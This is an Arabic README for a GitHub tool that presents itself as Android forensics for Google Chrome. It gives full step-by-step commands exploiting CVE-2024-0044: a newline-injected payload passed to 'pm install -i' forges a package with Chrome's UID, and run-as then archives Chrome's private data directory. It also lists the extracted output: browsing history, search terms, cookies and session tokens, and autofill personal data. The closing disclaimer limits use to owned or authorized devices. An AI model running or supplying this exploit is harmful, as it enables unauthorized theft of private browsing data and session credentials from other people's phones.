
أداة قوية للتحقيق الرقمي الجنائي لاستخراج وتحليل آثار متصفح جوجل كروم من أجهزة أندرويد
أداة فورينزك رقمي قوية لاستخراج وتحليل آثار جوجل كروم من أجهزة أندرويد
الميزات • التثبيت • الاستخدام • التوثيق
المؤلف: JackTekno
GitHub: github.com/JackTekno
تستخدم هذه الأداة ثغرة CVE-2024-0044 (Run-as) لتجاوز قيود الصلاحيات على أجهزة أندرويد 12/13 غير المجذَّرة، مما يتيح استخراج بيانات جوجل كروم للأغراض الجنائية. تقوم الأداة بتحليل قواعد بيانات SQLite الخام وإنشاء تقارير تحليل شاملة.

سير عمل تحليل جنائي كامل بدءًا من الاستخراج وصولًا إلى إعداد التقارير
تقوم الأداة بإنشاء تقرير Excel شامل (result_chrome_forensic.xlsx) يحتوي على الأوراق التالية:
F-Droid.apk)استنساخ المستودع
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
تثبيت التبعيات
pip install -r requirements.txt
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)
⚠️ استبدل
10129بمعرّف UID الفعلي لكروم من الخطوة 3
adb shell
# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Exit ADB Shell
exit
adb pull /data/local/tmp/chrome.tar .
استخرج ملف chrome.tar في مجلد المشروع. لا تحتاج إلى نقل الملفات يدويًا. سيعثر سكربت بايثون تلقائيًا على ملفات قاعدة البيانات داخل المجلدات المستخرجة.
tar -xf chrome.tar
شغّل أداة التحليل الجنائي:
python3 chrome_forensic.py
ستقوم الأداة بتحليل ملفات قاعدة البيانات وإنشاء result_chrome_forensic.xlsx في نفس الدليل.
⚠️ هام: تم تصميم هذه الأداة لأغراض التحليل الجنائي التعليمي والمصرح به فقط.
- استخدمها فقط على الأجهزة التي تملكها أو لديك إذن كتابي صريح لتحليلها
- الوصول غير المصرح به إلى الأجهزة الرقمية قد ينتهك القوانين في منطقتك
- لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذه الأداة
المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).
هذا المشروع مرخص بموجب رخصة جنو العمومية العامة الإصدار 3.0. راجع ملف LICENSE للتفاصيل.
تم تلخيص ومشاركة إثبات المفهوم لطريقة الاستخراج بواسطة Tinyhack.com.
صُنع بكل ❤️ بواسطة JackTekno
| اسم الورقة | الوصف |
|---|
| 📖 سجل التصفح | خط زمني مفصّل للمواقع التي تمت زيارتها |
| 📈 التحليلات – المواقع الأعلى | ترتيب إحصائي لأكثر النطاقات زيارة |
| ⚠️ تنبيهات – مشبوه | عناوين URL يتم وضع علامة عليها تلقائيًا (قرصنة، مخدرات، محتوى للبالغين) |
| 📥 التنزيلات | سجل التنزيلات مع المسارات وأحجام الملفات |
| 🔍 مصطلحات البحث | استعلامات بحث المستخدم من شريط العناوين/جوجل |
| 🍪 الكوكيز والجلسات | رموز الجلسات وبيانات الكوكيز الوصفية (مشفرة Hex) |
| ✍️ بيانات الملء التلقائي | بيانات النماذج المحفوظة (الأسماء، العناوين، إلخ.) |